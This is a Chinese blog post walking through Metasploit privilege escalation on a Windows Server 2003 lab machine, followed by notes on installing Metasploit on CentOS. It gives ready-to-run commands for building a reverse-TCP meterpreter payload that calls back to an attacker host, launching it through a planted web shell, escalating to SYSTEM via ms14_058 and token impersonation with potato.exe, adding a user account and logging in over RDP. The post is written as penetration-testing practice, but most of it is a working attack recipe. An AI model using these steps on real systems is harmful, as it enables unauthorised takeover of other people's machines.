前言
- metasploit 提权使用
常用的提权模块
metasploit 提权EXP存储文件夹路径
1 | find / -name metasploit |
windows2003提权
环境:2003 server
1、生成攻击载荷
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=6666 -f exe > payload.exe |
2、接着在kali中运行msfconsole执行下面命令来监听(玩过msf应该都很熟悉)
1 | use exploit/multi/handler |
3、首先去虚拟机中确认生成payload是否有用,发现得到session,可以去受害机进行执行获取session
4、受害机已经获得shell了,然后上传这个payload去一个可读可写的目录,然后进行运行就可以拿到session,我直接用大马执行
但是拿到的权限很低,接下来我们想办法上的system权限,但是getsystem/getprivs并不能在这里轻松提权
5、接着用post里面的模块multi检测该系统可利用的提权模块
1 | run post/multi/recon/local_exploit_suggester |
可以发现有很多,我们随便选一个ms14_058的吧,先background收起sessions,然后再进行利用
1 | background |
先看看sess的id以确定利用时所选的set
1 | session -l 查看id |
然后set session 1
接着提权成功,很自动化,很无脑提权到最高权限
一些基础命令的使用和记录
1 | ps 查看pid |
接着常规操作,有系统权限,增加用户
1 | shell 进入cmd命令操作 |
对方在公网的话,直接登3389,kali的话用
1 | rdesktop 192.168.0.115 |
在介绍一下ms16-075的提权方法
还是回到普通权限
1、伪造身份
1 | use incognito |
2、执行一下ms075的potato.exe其实,上面已经显示可以提权了
1 | execute -cH -f C:/RECYCLER/potato.exe |
3、直接伪造系统身份
1 | impersonate_token "NT AUTHORITY\SYSTEM" |
记录一些msf在centos安装采坑
安装msf的具体命令如下
1 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall |
接着本地出现msfinstall,然后给权限和安装
1 | chmod 755 msfinstall |
msf卸载方法(出现故障使用)
1 | yum remove metasploit-framework |
msfupdate之后需要进行环境变量配置
1 | export PATH="/opt/metasploit-framework/bin:$PATH" |
我的个人博客
孤桜懶契:http://gylq.gitee.io